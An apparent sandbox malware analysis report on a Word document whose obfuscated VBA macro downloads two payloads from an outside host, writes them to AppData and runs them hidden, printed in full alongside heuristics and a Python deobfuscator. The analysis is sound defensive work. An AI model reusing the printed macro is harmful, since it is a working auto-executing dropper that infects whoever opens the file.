Verdict: MALICIOUS
Risk Score: 398
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1059 Command and Scripting Interpreter
The sample carries an obfuscated VBA macro whose Document_Open handler runs as soon as macros are enabled. Every indicator (COM ProgIDs, HTTP verb, environment variable name, output folder and file names, the cmd.exe command line) is rebuilt at run time by the custom routine r5em520j(), which XORs each character of a Chr()/literal concatenation with every byte of the key "o4jskyrr" in turn; because the two "r" bytes cancel, the whole scheme reduces to a single XOR with 0x50 and is trivially reversible. Decoded, the handler creates an HTTP request object and an ADODB.Stream, issues two requests to http://192.168.1.239:8000 (a private RFC 1918 address, so this capture most likely comes from a lab or an internal staging host rather than public infrastructure), creates a folder under an Environ()-derived path if it is missing, writes each response body to a file with SaveToFile and launches it via Shell(..., vbHide). It then hides the text of the first section behind a white background; Document_Close restores the text, sets a blue background and saves without prompting, a lure/cleanup pattern rather than a second execution path. The WScript.Shell object appears only in the helper ShellRun(), which runs `wmic os get OsArchitecture` to test for 64-bit Windows and is not called from anywhere in the extracted source. Taken together, the macro is a two-stage downloader/dropper.
Heuristics (11)

- VBA macros detected (medium, 8 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Potential Shell call in VBA (critical) OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
  `Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)`
- WScript.Shell usage (critical) OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
  `Set oShell = CreateObject("WScript.Shell")`
- VBA downloads and writes a file to disk (critical) OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  `.write xHttp.responseBody`
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
  `Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))`
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: the same `Dim xHttp: Set xHttp = CreateObject(...)` line as above.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
  `Private Sub Document_Open()`
- Environ() call (env variable access) (low) OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
  `e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & Chr(29) & "" & "9" & Chr(51) & Chr(34) & "?" & "" & "#" & Chr(63) & "" & Chr(54) & "" & Chr(36) & Chr(3) & Chr(53) & "" & Chr(34) & Chr(38) & "" & Chr(57) & "" & "3" & Chr(53) & "" & "#")`
- Reference to Windows Script Host (high) SC_STR_WSCRIPT: Reference to Windows Script Host.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://192.168.1.239:8000 (referenced by macro; this is the download host, assigned to the plaintext variable miydzki9 in Document_Open)
  - http://schemas.openxmlformats.org/drawingml/2006/main (labelled "referenced by macro")
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (labelled "referenced by macro")
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (labelled "referenced by macro")
  The three schemas.openxmlformats.org entries are the standard OOXML namespace URIs for the DrawingML, bibliography and customXml parts; they do not occur in the extracted macro source and carry no network significance, so they should not be treated as indicators.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5682 bytes | d96f8666aa8de4dc026a50f1c52ff1cf64d797acc6ba8e3b0e1a6d1c645c3add |
Preview script (first 1,000 lines of the extracted script; the macro is far shorter than that, so this is the complete decoded source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function rm9y(str As String) As Variant: Dim bytes() As Byte: bytes = str: rm9y = bytes: End Function
Function x9vj(bytes() As Byte) As String: Dim str As String: str = bytes: x9vj = str: End Function
Function r5em520j(str As String) As String
Const p_ As String = "o4jskyrr"
Dim sb_() As Byte, pb_() As Byte
sb_ = rm9y(str)
pb_ = rm9y(p_)
Dim uL As Long
uL = UBound(sb_)
ReDim scb_(0 To uL) As Byte
Dim idx As Long
For idx = LBound(sb_) To uL:
If Not sb_(idx) = 0 Then
c = sb_(idx)
For i = 0 To UBound(pb_):
c = c Xor pb_(i)
Next i
scb_(idx) = c
End If
Next idx
r5em520j = x9vj(scb_)
End Function
Private Sub Document_Open()
Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))
Dim bStrm: Set bStrm = CreateObject(r5em520j(" " & Chr(52) & "" & Chr(63) & "4" & "2" & "~" & Chr(3) & "" & Chr(36) & "" & Chr(34) & Chr(53) & Chr(49) & Chr(61)))
Dim miydzki9 As String
'miydzki9 = r5em520j(Chr(49) & Chr(52) & ";" & " " & " " & "1" & "" & Chr(34) & "" & Chr(36))
miydzki9 = "http://192.168.1.239:8000"
xHttp.Open r5em520j(" " & Chr(21) & " "), miydzki9 + r5em520j(Chr(127) & Chr(3) & Chr(53) & Chr(49) & """" & "3" & "" & "8" & "" & "5" & "" & " " & "" & " " & "~" & "" & Chr(32) & ">" & "" & "7" & ""), False
xHttp.Send
Dim e1xa5dt7 As String
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & Chr(29) & "" & "9" & Chr(51) & Chr(34) & "?" & "" & "#" & Chr(63) & "" & Chr(54) & "" & Chr(36) & Chr(3) & Chr(53) & "" & Chr(34) & Chr(38) & "" & Chr(57) & "" & "3" & Chr(53) & "" & "#")
If Len(Dir(e1xa5dt7, vbDirectory)) = 0 Then
MkDir e1xa5dt7
End If
e1xa5dt7 = e1xa5dt7 + r5em520j(Chr(12) & Chr(3) & Chr(53) & "" & Chr(49) & """" & "" & Chr(51) & "8" & Chr(53) & "" & " " & "" & " " & "~" & Chr(53) & Chr(40) & Chr(53) & "")
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile e1xa5dt7, 2 '//overwrite
End With
Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)
Dim xHttp2: Set xHttp2 = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))
Dim bStrm2: Set bStrm2 = CreateObject(r5em520j(" " & Chr(52) & "" & Chr(63) & "4" & "2" & "~" & Chr(3) & "" & Chr(36) & "" & Chr(34) & Chr(53) & Chr(49) & Chr(61)))
xHttp2.Open r5em520j(" " & Chr(21) & " "), miydzki9 + r5em520j(" " & Chr(36) & "" & "1" & "" & "#" & "" & Chr(59) & Chr(56) & "?" & "" & Chr(35) & "" & Chr(36) & Chr(39) & "5" & "" & Chr(126) & " " & Chr(62) & "" & Chr(55)), False
xHttp2.Send
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & "" & Chr(29) & "9" & "" & "3" & "" & """" & "?" & Chr(35) & "" & "?" & "6" & "$" & "" & " " & Chr(53) & """" & Chr(38) & "" & "9" & "3" & Chr(53) & "" & "#" & "" & " " & "" & Chr(36) & Chr(49) & Chr(35) & ";" & "8" & Chr(63) & Chr(35) & "" & Chr(36) & Chr(39) & "" & Chr(53) & "" & Chr(126) & "5" & "" & Chr(40) & "" & "5" & "")
With bStrm2
.Type = 1 '//binary
.Open
.write xHttp2.responseBody
.savetofile e1xa5dt7, 2 '//overwrite
End With
Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)
ActiveDocument.Sections(1).Range.Font.Hidden = True
ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
ActiveDocument.Background.Fill.ForeColor.RGB = RGB(255, 255, 255)
ActiveDocument.Background.Fill.Transparency = 0#
End Sub
Private Sub Document_Close()
ActiveDocument.Sections(1).Range.Font.Hidden = False
ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
ActiveDocument.Background.Fill.ForeColor.RGB = RGB(47, 84, 150)
'ActiveDocument.Background.Fill.Transparency = 0#
Documents.Save NoPrompt:=True, _
OriginalFormat:=wdOriginalDocumentFormat
End Sub
Public Function ShellRun() As Boolean
Dim oShell As Object
Set oShell = CreateObject("WScript.Shell")
Dim oExec As Object
Dim oOutput As Object
Set oExec = oShell.Exec("wmic os get OsArchitecture")
Set oOutput = oExec.StdOut
Dim s As Boolean
s = False
Dim sLine As String
While Not oOutput.AtEndOfStream
sLine = Trim(oOutput.ReadLine)
If InStr(sLine, "64-bit") = 1 Then s = True
Wend
ShellRun = s
End Function
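The r5em520j() routine in the extracted script, re-implemented in Python as an added example for this report (it is not the analyzer's code nor part of the sample). It folds the key to show why the scheme is a single-byte XOR, evaluates the Chr()/literal concatenations the macro passes to r5em520j(), and scans lines for the sink each decoded string reaches. The three sample lines are quoted from the extracted macro above (the Environ and Shell lines are shortened to a single call each). One caveat it encodes: the rendered preview shows unprintable characters as spaces, so a bare " " literal may be a control character that was lost in rendering; the scanner flags such arguments as ambiguous rather than guessing.

```python
"""Decoder for the r5em520j() string obfuscation used by the macro in this report,
plus a scanner that decodes every r5em520j(...) argument on lines that feed a COM
or execution sink. Example code written for this report; not part of the analyzer
or of the sample."""
import re
from functools import reduce

KEY = "o4jskyrr"            # Const p_ in the macro


def fold_key(key: str) -> int:
    """The macro XORs each plaintext byte with every key byte in turn, so the
    inner loop collapses to one constant: o^4^j^s^k^y^r^r, and the two r's cancel."""
    return reduce(lambda acc, ch: acc ^ ord(ch), key, 0)


FOLDED = fold_key(KEY)      # 0x50, i.e. 'P'


def r5em520j(s: str) -> str:
    """Mirror the macro: VBA strings are UTF-16, the bytes are XORed individually,
    and zero bytes (the high byte of every ASCII code unit) are left untouched.
    XOR is its own inverse, so this both encodes and decodes."""
    out = []
    for ch in s:
        lo, hi = ord(ch) & 0xFF, ord(ch) >> 8
        lo = lo ^ FOLDED if lo else 0
        hi = hi ^ FOLDED if hi else 0
        out.append(chr(lo | hi << 8))
    return "".join(out)


# One VBA string literal ("" inside a literal is an escaped quote) or one Chr(n).
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)')


def eval_concat(expr: str) -> tuple[str, bool]:
    """Evaluate a VBA expression built from literals and Chr(n) joined with &.
    The flag marks bare whitespace literals: the report preview renders
    unprintable characters as spaces, so those positions may be misread."""
    parts, ambiguous = [], False
    for lit, code in TOKEN.findall(expr):
        if code:
            parts.append(chr(int(code)))
        else:
            lit = lit.replace('""', '"')
            ambiguous |= lit != "" and lit.isspace()
            parts.append(lit)
    return "".join(parts), ambiguous


CALL = "r5em520j("
SINKS = ("CreateObject", "Shell", ".Open", "Environ", "MkDir")


def call_args(line: str):
    """Yield the argument text of each r5em520j(...) call on a line, tracking
    parentheses only outside quoted strings."""
    i = line.find(CALL)
    while i != -1:
        j = start = i + len(CALL)
        depth, quoted = 1, False
        while j < len(line) and depth:
            ch = line[j]
            if ch == '"':
                quoted = not quoted
            elif not quoted:
                depth += (ch == "(") - (ch == ")")
            j += 1
        yield line[start:j - 1]
        i = line.find(CALL, j)


def scan_macro(src: str) -> list[dict]:
    """Decode every obfuscated argument and name the sink it reaches."""
    findings = []
    for n, line in enumerate(src.splitlines(), 1):
        if CALL not in line:
            continue
        sink = next((s for s in SINKS if s in line), "other")
        for arg in call_args(line):
            text, ambiguous = eval_concat(arg)
            findings.append({"line": n, "sink": sink,
                             "decoded": r5em520j(text), "ambiguous": ambiguous})
    return findings


# Three lines quoted from the extracted macro (Environ/Shell lines shortened).
SAMPLE = r'''
Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49)))
Call Shell(r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)
'''.strip()

if __name__ == "__main__":
    print(f"folded key: 0x{FOLDED:02x}")
    for f in scan_macro(SAMPLE):
        print(f)
```

Run over the three quoted lines it yields `Microsoft.ppLHTTp` for the first CreateObject (flagged ambiguous; with the lost characters restored and ProgID matching being case-insensitive, this is Microsoft.XMLHTTP), `AppData` for the Environ() argument, and `start ` for the second half of the Shell command line. Applied to the remaining literals in the preview it recovers `dodb.Stream` (ADODB.Stream) for the second CreateObject, `MicrosoftServices` for the folder created with MkDir, a file name beginning `Searche` with two unrecoverable characters and a `.exe` extension, and `cmd.exe` at the start of the Shell command. Anything that decodes to 'P' is impossible in this scheme, since 0x50 XOR 0x50 is the zero byte the decoder skips, which is why the ProgIDs appear with odd casing.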